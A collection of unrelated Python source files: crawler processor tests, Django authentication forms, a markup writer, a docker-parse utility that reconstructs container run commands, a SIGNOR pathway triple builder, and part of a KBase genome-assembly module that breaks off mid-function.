self.assertIsNone(self.processor.project_manager.get('test_project'))
self.projectdb.insert('test_project', {
'name': 'test_project',
'group': 'group',
'status': 'TODO',
'script': inspect.getsource(sample_handler),
'comments': 'test project',
'rate': 1.0,
'burst': 10,
})
self.assertIsNone(self.processor.project_manager.get('not_exists'))
self.assertIsNotNone(self.processor.project_manager.get('test_project'))
task = {
"process": {
"callback": "on_start"
},
"project": "not_exists",
"taskid": "data:,on_start",
"url": "data:,on_start"
}
self.in_queue.put((task, {}))
time.sleep(1)
self.assertFalse(self.status_queue.empty())
while not self.status_queue.empty():
status = self.status_queue.get()
self.assertEqual(status['track']['process']['ok'], False)
self.assertIsNone(self.processor.project_manager.get('not_exists'))
def test_20_broken_project(self):
self.assertIsNone(self.processor.project_manager.get('test_broken_project'))
self.projectdb.insert('test_broken_project', {
'name': 'test_broken_project',
'group': 'group',
'status': 'DEBUG',
'script': inspect.getsource(sample_handler)[:10],
'comments': 'test project',
'rate': 1.0,
'burst': 10,
})
self.assertIsNone(self.processor.project_manager.get('not_exists'))
self.assertIsNotNone(self.processor.project_manager.get('test_broken_project'))
project_data = self.processor.project_manager.get('test_broken_project')
self.assertIsNotNone(project_data.get('exception'))
def test_30_new_task(self):
self.assertTrue(self.status_queue.empty())
self.assertTrue(self.newtask_queue.empty())
task = {
"process": {
"callback": "on_start"
},
"project": "test_project",
"taskid": "data:,on_start",
"url": "data:,on_start"
}
fetch_result = {
"orig_url": "data:,on_start",
"content": "on_start",
"headers": {},
"status_code": 200,
"url": "data:,on_start",
"time": 0,
}
self.in_queue.put((task, fetch_result))
time.sleep(1)
self.assertFalse(self.status_queue.empty())
while not self.status_queue.empty():
self.status_queue.get()
self.assertFalse(self.newtask_queue.empty())
def test_40_index_page(self):
task = None
while not self.newtask_queue.empty():
task = self.newtask_queue.get()[0]
self.assertIsNotNone(task)
fetch_result = {
"orig_url": task['url'],
"content": (
"<html><body>"
"<a href='http://binux.me'>binux</a>"
"<a href='http://binux.me/中文'>binux</a>"
"<a href='http://binux.me/1'>1</a>"
"<a href='http://binux.me/1'>2</a>"
"</body></html>"
),
"headers": {'a': 'b', 'etag': 'tag'},
"status_code": 200,
"url": task['url'],
"time": 0,
}
self.in_queue.put((task, fetch_result))
time.sleep(1)
self.assertFalse(self.status_queue.empty())
self.assertFalse(self.newtask_queue.empty())
status = self.status_queue.get()
self.assertEqual(status['track']['fetch']['ok'], True)
self.assertEqual(status['track']['fetch']['time'], 0)
self.assertEqual(status['track']['fetch']['status_code'], 200)
self.assertEqual('tag', status['track']['fetch']['headers']['etag'])
self.assertIsNone(status['track']['fetch']['content'])
self.assertEqual(status['track']['process']['ok'], True)
self.assertGreater(status['track']['process']['time'], 0)
self.assertEqual(status['track']['process']['follows'], 3)
self.assertIsNone(status['track']['process']['result'])
self.assertEqual(status['track']['process']['logs'], '')
self.assertIsNone(status['track']['process']['exception'])
tasks = self.newtask_queue.get()
self.assertEqual(len(tasks), 3)
self.assertEqual(tasks[0]['url'], 'http://binux.me/')
self.assertTrue(tasks[1]['url'].startswith('http://binux.me/%'), task['url'])
def test_50_fetch_error(self):
# clear new task queue
while not self.newtask_queue.empty():
self.newtask_queue.get()
# clear status queue
while not self.status_queue.empty():
self.status_queue.get()
task = {
"process": {
"callback": "index_page"
},
"project": "test_project",
"taskid": "data:,test_fetch_error",
"url": "data:,test_fetch_error"
}
fetch_result = {
"orig_url": task['url'],
"content": "test_fetch_error",
"error": "test_fetch_error",
"headers": {'a': 'b', 'last-modified': '123'},
"status_code": 598,
"url": task['url'],
"time": 0,
}
self.in_queue.put((task, fetch_result))
time.sleep(1)
self.assertFalse(self.status_queue.empty())
self.assertTrue(self.newtask_queue.empty())
status = self.status_queue.get()
self.assertEqual(status['track']['fetch']['ok'], False)
self.assertEqual(status['track']['fetch']['time'], 0)
self.assertEqual(status['track']['fetch']['status_code'], 598)
self.assertEqual('123', status['track']['fetch']['headers']['last-modified'])
self.assertIsNotNone(status['track']['fetch']['content'])
self.assertEqual(status['track']['process']['ok'], False)
self.assertGreater(status['track']['process']['time'], 0)
self.assertEqual(status['track']['process']['follows'], 0)
self.assertIsNone(status['track']['process']['result'])
self.assertGreater(len(status['track']['process']['logs']), 0)
self.assertIsNotNone(status['track']['process']['exception'])
def test_60_call_broken_project(self):
# clear new task queue
while not self.newtask_queue.empty():
self.newtask_queue.get()
# clear status queue
while not self.status_queue.empty():
self.status_queue.get()
task = {
"process": {
"callback": "on_start"
},
"project": "test_broken_project",
"taskid": "data:,on_start",
"url": "data:,on_start",
}
fetch_result = {
"orig_url": "data:,on_start",
"content": "on_start",
"headers": {},
"status_code": 200,
"url": "data:,on_start",
"time": 0,
}
self.in_queue.put((task, fetch_result))
time.sleep(1)
self.assertFalse(self.status_queue.empty())
while not self.status_queue.empty():
status = self.status_queue.get()
self.assertEqual(status['track']['fetch']['ok'], True)
self.assertEqual(status['track']['process']['ok'], False)
self.assertGreater(len(status['track']['process']['logs']), 0)
self.assertIsNotNone(status['track']['process']['exception'])
self.assertTrue(self.newtask_queue.empty())
def test_70_update_project(self):
self.processor.project_manager.CHECK_PROJECTS_INTERVAL = 1000000
self.processor.project_manager._check_projects()
self.assertIsNotNone(self.processor.project_manager.get('test_broken_project'))
# clear new task queue
while not self.newtask_queue.empty():
self.newtask_queue.get()
# clear status queue
while not self.status_queue.empty():
self.status_queue.get()
task = {
"process": {
"callback": "on_start"
},
"project": "test_broken_project",
"taskid": "data:,on_start",
"url": "data:,on_start"
}
fetch_result = {
"orig_url": "data:,on_start",
"content": "on_start",
"headers": {},
"status_code": 200,
"url": "data:,on_start",
"time": 0,
}
self.projectdb.update('test_broken_project', {
'script': inspect.getsource(sample_handler),
})
# not update
self.in_queue.put((task, fetch_result))
time.sleep(1)
self.assertFalse(self.status_queue.empty())
while not self.status_queue.empty():
status = self.status_queue.get()
self.assertEqual(status['track']['fetch']['ok'], True)
self.assertEqual(status['track']['process']['ok'], False)
# updated
task['project_updatetime'] = time.time()
self.in_queue.put((task, fetch_result))
time.sleep(1)
self.assertFalse(self.status_queue.empty())
while not self.status_queue.empty():
status = self.status_queue.get()
self.assertEqual(status['track']['fetch']['ok'], True)
self.assertEqual(status['track']['process']['ok'], True)
self.projectdb.update('test_broken_project', {
'script': inspect.getsource(sample_handler)[:10],
})
# update with md5
task['project_md5sum'] = 'testmd5'
del task['project_updatetime']
self.in_queue.put((task, fetch_result))
time.sleep(1)
self.assertFalse(self.status_queue.empty())
while not self.status_queue.empty():
status = self.status_queue.get()
self.assertEqual(status['track']['fetch']['ok'], True)
self.assertEqual(status['track']['process']['ok'], False)
self.processor.project_manager.CHECK_PROJECTS_INTERVAL = 0.1
|
import logging
from concurrent.futures.thread import ThreadPoolExecutor
from smtplib import SMTPAuthenticationError
from crispy_forms.helper import FormHelper
from crispy_forms.layout import HTML, Button, ButtonHolder, Column, Div, Field, Layout, Row, Submit
from django import forms
from django.contrib.auth import get_user_model
from django.contrib.auth.forms import AuthenticationForm, UserCreationForm, UsernameField
from django.contrib.auth.tokens import PasswordResetTokenGenerator
from django.template.loader import render_to_string
from django.utils.translation import ugettext_lazy as _
LOGGER = logging.getLogger(__name__)
class LoginForm(AuthenticationForm):
"""
Custom form to render with Crispy.
"""
custom_classes = 'bg-transparent border-extra border-top-0 border-right-0 border-left-0 border-bottom rounded-0'
def __init__(self, request=None, *args, **kwargs):
super(LoginForm, self).__init__(request=request, *args, **kwargs)
self.helper = FormHelper(self)
self.helper.id = 'loginForm'
self.helper.form_class = 'container-fluid'
self.helper.layout = Layout(
Div(
Field(
'username',
placeholder=_('Username'),
css_class=self.custom_classes,
),
Field(
'password',
placeholder=_('Password'),
css_class=self.custom_classes,
),
Div(
Div(
HTML(
'<a class="col-lg-8 btn-link" href="#no-url">{text}</a>'.format(
text=_('Forgot password?')
)
),
Submit('', _('Login'), css_class='btn btn-extra col-lg-4'),
css_class='row align-items-lg-center justify-content-lg-between'
),
css_class='container-fluid'
),
css_class='row flex-column'
)
)
self._clean_labels()
def _clean_labels(self):
for field in self.fields:
self.fields[field].label = ''
class SignUpForm(UserCreationForm):
"""
User registration form.
"""
button_classes = 'btn btn-info'
custom_classes = 'bg-transparent border-extra border-top-0 border-right-0 border-left-0 border-bottom rounded-0'
submit_classes = 'btn btn-extra btn-lg'
discord_id = forms.CharField(
label=_('Discord Identifier'),
max_length=254,
required=False,
help_text=_('If you have a Discord Account you want to link with just give us your ID!')
)
def __init__(self, request, *args, **kwargs):
super(SignUpForm, self).__init__(*args, **kwargs)
self.request = request
self.setup()
self.helper = FormHelper(self)
self.helper.id = 'registerForm'
self.helper.form_class = 'container-fluid'
self.helper.layout = Layout(
Row(
Column(
Field('username', css_class=self.custom_classes),
css_class='col-12 col-md-6'
),
Column(
Field('email', css_class=self.custom_classes),
css_class='col-12 col-md-6'
),
Column(
Field('password1', css_class=self.custom_classes),
css_class='col-12 col-md-6'
),
Column(
Field('password2', css_class=self.custom_classes),
css_class='col-12 col-md-6'
)
),
Row(
Field('discord_id', css_class=self.custom_classes),
Button('search', _('Send invitation!'), css_class=self.button_classes + ' align-self-center'),
css_class='justify-content-between'
),
ButtonHolder(
Submit('submit', _('Register'), css_class=self.submit_classes)
)
)
def setup(self, required_fields=None):
"""
Modifies some attributtes before rendering the form.
Parameters
----------
required_fields: Iterable.
Fields to modify and set as required.
"""
if not required_fields:
required_fields = ('email', )
for field in required_fields:
self.fields[field].required = True
def _generate_token(self, user) -> str:
"""
Generates a token for the user to confirm it's email.
Parameters
----------
user: User instance
The user associated to this token.
Returns
-------
token: :class:`str`
The token generated.
"""
token = PasswordResetTokenGenerator()
token = token.make_token(user)
return token
def _send_email_confirmation(self, user):
"""
Sends a confirmation email to the user.
"""
msg_html = render_to_string('email_templates/confirm_email.html', {
# We declare localhost as default for tests purposes
'domain': self.request.META.get('HTTP_HOST', 'http://localhost'),
'token': self._generate_token(user),
'object': user
})
try:
user.email_user(_('Welcome to Oil & Rope!'), '', html_message=msg_html)
except SMTPAuthenticationError:
LOGGER.exception('Unable to logging email server with given credentials.')
def save(self, commit=True):
"""
Before saving the instance it sets it to inactive until the user confirms email.
Returns
-------
instance: User instance created.
The user created.
"""
instance = super(SignUpForm, self).save(commit=False)
# Set active to False until user acitvates email
instance.is_active = False
if commit:
instance.save()
# User shouldn't wait for the email to be sent
with ThreadPoolExecutor(max_workers=2) as executor:
executor.submit(self._send_email_confirmation, instance)
return instance
class Meta:
model = get_user_model()
fields = ('username', 'email')
field_classes = {'username': UsernameField}
help_texts = {
'email': _('We will send you an email to confirm your account') + '.'
}
|
# Copyright 2008-2015 Nokia Solutions and Networks
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from .markuputils import attribute_escape, html_escape, xml_escape
from .robottypes import is_string
from .robotio import file_writer
class _MarkupWriter(object):
def __init__(self, output, write_empty=True):
"""
:param output: Either an opened, file like object, or a path to the
desired output file. In the latter case, the file is created
and clients should use :py:meth:`close` method to close it.
:param write_empty: Whether to write empty elements and attributes.
"""
if is_string(output):
output = file_writer(output)
self.output = output
self._write_empty = write_empty
self._preamble()
def _preamble(self):
pass
def start(self, name, attrs=None, newline=True):
attrs = self._format_attrs(attrs)
self._start(name, attrs, newline)
def _start(self, name, attrs, newline):
self._write('<%s %s>' % (name, attrs) if attrs else '<%s>' % name,
newline)
def _format_attrs(self, attrs):
if not attrs:
return ''
attrs = [(k, attribute_escape(attrs[k] or ''))
for k in self._order_attrs(attrs)]
write_empty = self._write_empty
return ' '.join('%s="%s"' % a for a in attrs if write_empty or a[1])
def _order_attrs(self, attrs):
return attrs
def content(self, content=None, escape=True, newline=False):
if content:
self._write(self._escape(content) if escape else content, newline)
def _escape(self, content):
raise NotImplementedError
def end(self, name, newline=True):
self._write('</%s>' % name, newline)
def element(self, name, content=None, attrs=None, escape=True,
newline=True, replace_newlines=False):
attrs = self._format_attrs(attrs)
if self._write_empty or content or attrs:
self._start(name, attrs, newline=False)
self.content(content, escape, replace_newlines)
self.end(name, newline)
def close(self):
"""Closes the underlying output file."""
self.output.close()
def _write(self, text, newline=False):
self.output.write(text)
if newline:
self.output.write('\n')
class HtmlWriter(_MarkupWriter):
def _order_attrs(self, attrs):
return sorted(attrs) # eases testing
def _escape(self, content):
return html_escape(content)
class XmlWriter(_MarkupWriter):
def _preamble(self):
self._write('<?xml version="1.0" encoding="UTF-8"?>', newline=True)
def _escape(self, text):
return xml_escape(text)
class NullMarkupWriter(object):
"""Null implementation of _MarkupWriter interface."""
__init__ = start = content = element = end = close = lambda *args: None
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
docker-parse is a useful command to get
docker-run commands or docker-compose configurations from running containers
'''
from __future__ import absolute_import
from __future__ import print_function
import sys
import pipes
import getopt
import yaml
import docker
__version__ = '0.5.5'
def output_compose(info, image_info):
'''output as docker-compose format'''
container = info['Name'][1:]
conf = info['Config']
hconf = info['HostConfig']
compose = {}
compose['container_name'] = str(container)
compose['image'] = str(conf['Image'])
# Volumes
if 'Binds' in hconf and isinstance(hconf['Binds'], list):
options = []
for volume in hconf['Binds']:
options.append(str(volume))
if len(options) > 0:
compose['volumes'] = options
if 'PortBindings' in hconf and isinstance(hconf['PortBindings'], dict):
options = []
for binding, hosts in hconf['PortBindings'].items():
for host in hosts:
portbinding = ''
if 'HostIp' in host and host['HostIp']:
portbinding += host['HostIp'] + ':'
if 'HostPort' in host and host['HostPort']:
portbinding += host['HostPort'] + ':'
portbinding += binding
options.append(str(portbinding))
if len(options) > 0:
compose['ports'] = options
# Devices
if 'Devices' in hconf and isinstance(hconf['Devices'], list):
options = []
for device in hconf['Devices']:
options.append(str(device))
if len(options) > 0:
compose['devices'] = options
# RestartPolicy
if 'RestartPolicy' in hconf and hconf['RestartPolicy']['Name']:
policy = hconf['RestartPolicy']['Name']
if hconf['RestartPolicy']['MaximumRetryCount'] > 0:
policy += ':' + str(hconf['RestartPolicy']['MaximumRetryCount'])
compose['restart'] = str(policy)
# Privileged
if hconf['Privileged']:
compose['privileged'] = True
# Env
if isinstance(conf['Env'], list) and len(conf['Env']) > 0:
options = []
for env in conf['Env']:
if env not in image_info['Config']['Env']:
options.append(str(env))
if len(options) > 0:
compose['environment'] = options
# DNS
if 'Dns' in hconf and isinstance(hconf['Dns'], list):
options = []
for dns in hconf['Dns']:
options.append(str(dns))
if len(options) > 0:
compose['dns'] = options
# ExposedPorts
if 'ExposedPorts' in conf and isinstance(conf['ExposedPorts'], dict):
options = []
for port, _ in conf['ExposedPorts'].items():
if ('ExposedPorts' not in image_info['Config'] or
port not in image_info['Config']['ExposedPorts']):
options.append(str(port))
if len(options) > 0:
compose['expose'] = options
# User
if conf['User'] and image_info['Config']['User'] != conf['User']:
compose['user'] = str(conf['User'])
# WorkingDir
if image_info['Config']['WorkingDir'] != conf['WorkingDir']:
compose['working_dir'] = str(conf['WorkingDir'])
# EntryPoint
if conf['Entrypoint'] != image_info['Config']['Entrypoint']:
if isinstance(conf['Entrypoint'], list):
entry = []
for entry_item in conf['Entrypoint']:
entry.append(str(entry_item))
if len(entry) > 0:
compose['entrypoint'] = entry
elif isinstance(conf['Entrypoint'], str):
compose['entrypoint'] = str(conf['Entrypoint'])
name = str(info['Name'][1:])
print(yaml.dump({name:compose}, encoding='utf-8', default_flow_style=False))
def output_command(info, image_info, pretty=False):
'''output as docker-run command format'''
sep = pretty and ' \\\n ' or ' '
short_options = ''
options = []
container = info['Name'][1:]
conf = info['Config']
hconf = info['HostConfig']
options.append("--name={name}".format(name=container))
if not conf['AttachStdout']:
short_options += 'd'
if conf['OpenStdin']:
short_options += 'i'
if conf['Tty']:
short_options += 't'
if len(short_options) > 0:
options.append('-' + short_options)
options.append("-h {hostname}".format(hostname=conf['Hostname']))
# Volumes
if 'Binds' in hconf and isinstance(hconf['Binds'], list):
for volume in hconf['Binds']:
options.append("-v {volume}".format(volume=volume))
# PortBindings
if 'PortBindings' in hconf and isinstance(hconf['PortBindings'], dict):
for port, hosts in hconf['PortBindings'].items():
for host in hosts:
portbinding = ''
if 'HostIp' in host and host['HostIp']:
portbinding += host['HostIp'] + ':'
if 'HostPort' in host and host['HostPort']:
portbinding += host['HostPort'] + ':'
portbinding += port
options.append("-p {portbinding}".format(portbinding=portbinding))
# Devices
if 'Devices' in hconf and isinstance(hconf['Devices'], list):
for device in hconf['Devices']:
options.append("--device={device}".format(device=device))
# RestartPolicy
if 'RestartPolicy' in hconf and hconf['RestartPolicy']['Name']:
policy = hconf['RestartPolicy']['Name']
if hconf['RestartPolicy']['MaximumRetryCount'] > 0:
policy += ':' + str(hconf['RestartPolicy']['MaximumRetryCount'])
options.append("--restart={policy}".format(policy=policy))
# Privileged
if hconf['Privileged']:
options.append('--privileged')
# DNS
if 'Dns' in hconf and isinstance(hconf['Dns'], list):
for dns in hconf['Dns']:
options.append("-dns={dns}".format(dns=dns))
# ExposedPorts
if 'ExposedPorts' in conf and isinstance(conf['ExposedPorts'], dict):
for port, _ in conf['ExposedPorts'].items():
if ('ExposedPorts' not in image_info['Config'] or
port not in image_info['Config']['ExposedPorts']):
options.append("--expose={port}".format(port=port))
# Env
if isinstance(conf['Env'], list):
for env in conf['Env']:
if env not in image_info['Config']['Env']:
options.append("-e {env}".format(env=pipes.quote(env)))
# EntryPoint
if conf['Entrypoint'] != image_info['Config']['Entrypoint']:
entry = []
if isinstance(conf['Entrypoint'], list):
for entry_item in conf['Entrypoint']:
entry.append(pipes.quote(entry_item))
elif isinstance(conf['Entrypoint'], str):
entry.append(pipes.quote(conf['Entrypoint']))
if len(entry) > 0:
options.append("--entrypoint={entry}".format(entry=pipes.quote(' '.join(entry))))
# WorkingDir
if image_info['Config']['WorkingDir'] != conf['WorkingDir']:
options.append("-w {dir}".format(dir=pipes.quote(conf['WorkingDir'])))
# User
if conf['User'] and image_info['Config']['User'] != conf['User']:
options.append("-u {user}".format(user=pipes.quote(conf['User'])))
# Cmd
cmd = []
if conf['Cmd'] != image_info['Config']['Cmd']:
if isinstance(conf['Cmd'], list):
for cmd_item in conf['Cmd']:
cmd.append(pipes.quote(cmd_item))
elif isinstance(conf['Cmd'], str):
cmd.append(pipes.quote(conf['Cmd']))
print('# docker-run command for {container}'.format(container=container))
cmd_str = 'docker run{sep}{options}{sep}{image}'.format(
options=sep.join(options), sep=sep, image=conf['Image'])
if len(cmd) > 0:
cmd_str += ' ' + ' '.join(cmd)
print(cmd_str)
print()
def main():
'''main entry'''
cli = docker.from_env()
try:
opts, args = getopt.gnu_getopt(sys.argv[1:], "pcv", ["pretty", "compose"])
except getopt.GetoptError as _:
print("Usage: docker-parse [--pretty|-p|--compose|-c] [containers]")
sys.exit(2)
if len(args) == 0:
containers = cli.containers.list(all=True)
else:
containers = map(lambda nm: cli.containers.get(nm), args)
as_compose = False
pretty = False
for opt, _ in opts:
if opt == '-v':
print(__version__)
sys.exit()
elif opt == '-p' or opt == '--pretty':
pretty = True
break
elif opt == '-c' or opt == '--compose':
as_compose = True
break
for container in containers:
info = container.attrs
# diff with image info to reduce information
image_info = cli.images.get(info['Config']['Image']).attrs
if as_compose:
output_compose(info, image_info)
else:
output_command(info, image_info, pretty)
if __name__ == "__main__":
main()
|
from django.urls import path
from charaViewer.viewer.views import (top_view,
login_view)
urlpatterns = [
path('', top_view, name="viewer_top"),
path('login', login_view, name="viewer_login"),
]
|
import os
import pandas as pd
from copy import deepcopy
from itertools import product
from indra.sources import signor
from collections import defaultdict
from indra.statements import Activation, Inhibition
from causal_precedence_training import locations
def get_relevant_signor_statements():
"""Get Inhibition and Activation statements from SIGNOR
Returns
----------
signor_stmts_by_id : dict
Dictionary mapping SIGNOR IDs to lists of associated statements
"""
sp = signor.process_from_web()
signor_stmts_by_id = defaultdict(list)
for stmt in sp.statements:
if isinstance(stmt, Inhibition) or isinstance(stmt, Activation):
signor_stmts_by_id[stmt.evidence[0].source_id].append(stmt)
signor_stmts_by_id = dict(signor_stmts_by_id)
def generate_signor_triples_dataframe(signor_stmts_by_id):
SIGNOR_pathway_dfs = []
for pathway_filename in os.listdir(locations.SIGNOR_PATHWAYS_DIRECTORY):
filepath = os.path.join(locations.SIGNOR_PATHWAYS_DIRECTORY,
pathway_filename)
# Load relevant columns of pathway tsv file
pathway_df = pd.read_csv(filepath, sep='\t', keep_default_na=False,
usecols=['SIGNOR_ID', 'ENTITYA', 'ENTITYB',
'EFFECT'])
# Filter to only activations and inhibitions
pathway_df = pathway_df[
pathway_df.EFFECT.isin(['up-regulates activity',
'down-regulates activity'])]
# Add column for INDRA statement associated to each edge in pathway
pathway_df['statement'] = pathway_df.SIGNOR_ID.\
apply(lambda x: signor_stmts_by_id[x][0])
# Pathway TSV files are inconsistent regarding naming of pathways.
# Some have column for the pathway name while others don't. Use the
# associated filename ot label each pathway since it is always
# present.
pathway_df['pathway_filename'] = pathway_filename
# Perform a self inner join from Object to Subject to collect causal
# triples from within the pathway.
pathway_df = pathway_df.\
merge(pathway_df, left_on='ENTITYB', right_on='ENTITYA',
how='inner')
# Do some renaming to clean up column names after join
pathway_df.\
rename({'ENTITYA_x': 'signor_entity1',
'ENTITYA_y': 'signor_entity2',
'ENTITYB_y': 'signor_entity3',
'statement_x': 'statement1',
'statement_y': 'statement2',
'pathway_filename_x': 'pathway_filename'}, axis=1,
inplace=True)
# Drop unnecessary columns
pathway_df.drop(['pathway_filename_y', 'ENTITYB_x',
'SIGNOR_ID_x', 'SIGNOR_ID_y'], axis=1, inplace=True)
SIGNOR_pathway_dfs.append(pathway_df)
# Concatenate the rows of the dataframes together into one large dataframe
# Use shortname to make following filter more readable
df = pd.concat(SIGNOR_pathway_dfs)
# Filter self edges and loops
df = df[(df.signor_entity1 != df.signor_entity3) &
(df.signor_entity1 != df.signor_entity2) &
(df.signor_entity2 != df.signor_entity3)]
# Remove duplicate triples
df = df.groupby(['signor_entity1', 'signor_entity2',
'signor_entity3'],
as_index=False).first()
# Change order of columns
df = df[['statement1', 'statement2', 'signor_entity1', 'signor_entity2',
'signor_entity3', 'pathway_filename']]
# Expand bound conditions into multiple statements
# Pull out agents A->B->C from chain
df['A'] = df.statement1.apply(lambda x: x.subj)
df['B'] = df.statement1.apply(lambda x: x.obj)
df['C'] = df.statement2.apply(lambda x: x.obj)
# Add columns for bound agents if they exist
df['A_bound'] = df.A.apply(_get_bound_agent)
df['B_bound'] = df.B.apply(_get_bound_agent)
df['C_bound'] = df.C.apply(_get_bound_agent)
# Drop bound conditions from agent columns
df.loc[:, 'A'] = df.A.apply(_get_unbound_agent)
df.loc[:, 'B'] = df.B.apply(_get_unbound_agent)
df.loc[:, 'C'] = df.C.apply(_get_unbound_agent)
# I can't think of a better way than just iterating over the dataframe
new_rows = []
for _, row in df.iterrows():
for A, B, C in product([row['A'], row['A_bound']],
[row['B'], row['B_bound']],
[row['C'], row['C_bound']]):
if pd.isna(A) or pd.isna(B) or pd.isna(C):
continue
new_stmt1 = deepcopy(row['statement1'])
new_stmt2 = deepcopy(row['statement2'])
new_stmt1.subj, new_stmt1.obj = A, B
new_stmt2.subj, new_stmt2.obj = B, C
new_rows.append([new_stmt1, new_stmt2, row['signor_entity1'],
row['signor_entity2'], row['signor_entity3'],
row['pathway_filename']])
df = pd.DataFrame(new_rows,
columns=['statement1', 'statement2', 'signor_entity1',
'signor_entity2', 'signor_entity3',
'pathway_filename'])
return df
def _get_bound_agent(agent):
"""Get first bound condition agent for an agent if one exists."""
if agent.bound_conditions:
return deepcopy(agent.bound_conditions[0].agent)
else:
return float('nan')
def _get_unbound_agent(agent):
"""Return agent with all bound conditoins removed"""
result = deepcopy(agent)
if result.bound_conditions:
result.bound_conditions = []
return result
def main():
triples_df = generate_signor_triples_dataframe(
get_relevant_signor_statements()
)
triples_df.to_pickle(os.path.join(locations.TRIPLES_DIRECTORY,
'signor_causal_triples.pkl'))
if __name__ == '__main__':
main()
|
# -*- coding: utf-8 -*-
#BEGIN_HEADER
import os
import sys
import shutil
import hashlib
import subprocess
import traceback
import uuid
import logging
import pprint
import json
import tempfile
import re
from datetime import datetime
from AssemblyUtil.AssemblyUtilClient import AssemblyUtil
from pprint import pprint, pformat
from collections import Iterable
import numpy as np
from Bio import SeqIO
from biokbase.workspace.client import Workspace as workspaceService
# logging.basicConfig(format="[%(asctime)s %(levelname)s %(name)s] %(message)s", level=logging.DEBUG)
logger = logging.getLogger(__name__)
#END_HEADER
class AssemblyRAST:
'''
Module Name:
AssemblyRAST
Module Description:
A KBase module: AssemblyRAST
This modules run assemblers supported in the AssemblyRAST service.
'''
######## WARNING FOR GEVENT USERS ####### noqa
# Since asynchronous IO can lead to methods - even the same method -
# interrupting each other, you must be *very* careful when using global
# state. A method could easily clobber the state set by another while
# the latter method is running.
######################################### noqa
VERSION = "0.0.4"
GIT_URL = "git@github.com:scanon/ARAST_SDK.git"
GIT_COMMIT_HASH = "9212af592b71ee2df38562378489b0dedee0bf1a"
#BEGIN_CLASS_HEADER
workspaceURL = None
# target is a list for collecting log messages
def log(self, target, message):
# we should do something better here...
if target is not None:
target.append(message)
print(message)
sys.stdout.flush()
def create_temp_json(self, attrs):
f = tempfile.NamedTemporaryFile(delete=False)
outjson = f.name
f.write(json.dumps(attrs))
f.close()
return outjson
# combine multiple read library objects into a kbase_assembly_input
def combine_read_libs(self, libs):
pe_libs = []
se_libs = []
refs = []
for libobj in libs:
data = libobj['data']
info = libobj['info']
#print(json.dumps(data))
#print(json.dumps(info))
type_name = info[2].split('.')[1].split('-')[0]
lib = dict()
if type_name == 'PairedEndLibrary':
if 'lib1' in data:
lib['handle_1'] = data['lib1']['file']
if 'file_name' not in lib['handle_1']:
lib['handle_1']['file_name']='lib1.fq'
elif 'handle_1' in data:
lib['handle_1'] = data['handle_1']
if 'file_name' not in lib['handle_1']:
lib['handle_1']['file_name']='lib1.fq'
if 'lib2' in data:
lib['handle_2'] = data['lib2']['file']
if 'file_name' not in lib['handle_2']:
lib['handle_2']['file_name']='lib2.fq'
elif 'handle_2' in data:
lib['handle_2'] = data['handle_2']
if 'file_name' not in lib['handle_2']:
lib['handle_2']['file_name']='lib2.fq'
if 'interleaved' in data:
lib['interleaved'] = data['interleaved']
if isinstance(lib['interleaved'], Iterable) and 'file_name' not in lib['interleaved']:
lib['interleaved']['file_name']='reads.fq'
pe_libs.append(lib)
elif type_name == 'SingleEndLibrary':
if 'lib' in data:
lib['handle'] = data['lib']['file']
elif 'handle' in data:
lib['handle'] = data['handle']
if 'file_name' not in lib['handle']:
lib['handle']['file_name']='reads.fq'
se_libs.append(lib)
assembly_input = { 'paired_end_libs': pe_libs,
'single_end_libs': se_libs,
'references': refs }
logger.debug('kbase_assembly_input = {}'.format(json.dumps(assembly_input)))
return assembly_input
# template
def arast_run(self, ctx, params, assembler, server='http://localhost:8000'):
output = None
console = []
self.log(console,'Running run_{} with params='.format(assembler))
self.log(console, pformat(params))
#### do some basic checks
if 'workspace_name' not in params:
raise ValueError('workspace_name parameter is required')
if 'read_library_refs' not in params and 'read_library_names' not in params:
raise ValueError('read_library_refs or read_library_names parameter is required')
if 'read_library_refs' in params:
if type(params['read_library_refs']) != list:
raise ValueError('read_library_refs must be a list')
if 'read_library_names' in params:
if type(params['read_library_names']) != list:
raise ValueError('read_library_names must be a list')
if 'output_contigset_name' not in params:
raise ValueError('output_contigset_name parameter is required')
min_contig_len = params.get('min_contig_len') or 300
token = ctx['token']
os.environ["KB_AUTH_TOKEN"] = token
os.environ["ARAST_URL"] = server
ws = workspaceService(self.workspaceURL)
ws_libs = []
if 'read_library_refs' in params:
for lib_ref in params['read_library_refs']:
ws_libs.append({'ref': lib_ref})
if 'read_library_names' in params:
for lib_name in params['read_library_names']:
ws_libs.append({'ref': params['workspace_name'] + '/' + lib_name})
if len(ws_libs)==0:
raise ValueError('At least one read library must be provided in read_library_refs or read_library_names')
libs = ws.get_objects2({'objects': ws_libs})['data']
wsid = libs[0]['info'][6]
kbase_assembly_input = self.combine_read_libs(libs)
tmp_data = self.create_temp_json(kbase_assembly_input)
mode = ''
cmd = ['ar-run', '--data-json', tmp_data]
if assembler:
cmd = cmd + ['-a', assembler]
mode = 'assembler: ' + assembler
elif 'pipeline' in params and params['pipeline']:
cmd = cmd + ['-p', params['pipeline']]
mode = 'assembly pipeline: ' + params['pipeline']
else:
cmd = cmd + ['-r', params.get('recipe', 'auto')]
mode = 'assembly recipe: ' + params['recipe']
logger.info('Start {}'.format(mode))
logger.debug('CMD: {}'.format(' '.join(cmd)))
p = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, shell=False)
out, err = p.communicate()
logger.debug(out)
if p.returncode != 0:
raise ValueError('Error running ar_run, return code: {}\n'.format(p.returncode))
job_id = None
match = re.search('(\d+)', out)
if match:
job_id = match.group(1)
else:
raise ValueError('No integer job ID found: {}\n'.format(out))
timestamp = int((datetime.utcnow() - datetime.utcfromtimestamp(0)).total_seconds()*1000)
output_dir = os.path.join(self.scratch, 'output.'+str(timestamp))
output_contigs = os.path.join(output_dir, 'contigs.fa')
if not os.path.exists(output_dir):
os.makedirs(output_dir)
cmd = ['ar-get', '-j', job_id, '-w', '-l']
logger.debug('CMD: {}'.format(' '.join(cmd)))
ar_log = subprocess.check_output(cmd)
self.log(console, ar_log)
cmdstr = 'ar-get -j {} -w -p | ar-filter -l {} > {}'.format(job_id, min_contig_len, output_contigs)
